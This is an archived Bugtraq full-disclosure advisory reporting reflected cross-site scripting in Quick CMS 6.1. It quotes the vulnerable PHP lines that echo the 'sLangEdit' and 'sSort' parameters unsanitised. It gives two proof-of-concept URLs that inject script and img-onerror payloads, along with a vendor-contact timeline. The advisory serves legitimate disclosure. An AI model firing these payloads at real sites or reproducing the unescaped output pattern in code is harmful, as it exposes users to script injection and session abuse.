lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Tue, 19 Jan 2016 16:23:21 +0530
From: Rahul Pratap Singh <techno.rps@...il.com>
To: bugtraq@...urityfocus.com
Subject: Quick CMS v 6.1 XSS Vulnerability

## FULL DISCLOSURE

#Product    : Quick CMS
#Exploit Author  : Rahul Pratap Singh
#Version    : 6.1
#Home page Link  : http://opensolution.org/home.html
#Website    : 0x62626262.wordpress.com
#Linkedin   : https://in.linkedin.com/in/rahulpratapsingh94
#Date       : 19/Jan/2016

XSS Vulnerability:

----------------------------------------
Description:
----------------------------------------
 "sLangEdit" and "sSort" parameters are not sanitized that leads to
Reflected XSS.

----------------------------------------
Vulnerable Code:
----------------------------------------
File Name: languages.php

Found at line:23	
<h1><?php echo $lang['Languages'].( isset( $_GET['sLangEdit'] ) ? '
'.$_GET['sLangEdit'] : null ); ?></h1>

File Name: pages.php

Found at line:49	
<form action="?p=pages<?php if( isset( $_GET['sSort'] ) ) echo
'&amp;sSort='.$_GET['sSort']; ?>" name="form" method="post"
class="main-form">

----------------------------------------
Exploit:
----------------------------------------
localhost/Quick.Cms_v6.1-en/admin.php?p=languages&sLangEdit=</h1><script>alert("XSS")</script><h1>

localhost/Quick.Cms_v6.1-en/admin.php?p=pages&sSort="><img%20src=x%20onerror=confirm(1)><!--

----------------------------------------
POC:
----------------------------------------
https://0x62626262.files.wordpress.com/2016/01/quick-cms-v6-1xsspoc.png
https://0x62626262.files.wordpress.com/2016/01/quick-cms-v6-1xsspoc2.png


Disclosure Timeline:
Tried to contact vendor via email  : 14/1/2016 ( email bounce back)
Tried to contact vendor via forum : 18/1/2016 (thread deleted, no response)
Public Disclosure: 19/1/2016

Pub ref:
https://0x62626262.wordpress.com/2016/01/19/quick-cms-v-6-1-xss-vulnerability

Download attachment "0x9ACF7D5F.asc" of type "application/pgp-keys" (3134 bytes)

Download attachment "signature.asc" of type "application/pgp-signature" (837 bytes)

Powered by blists - more mailing lists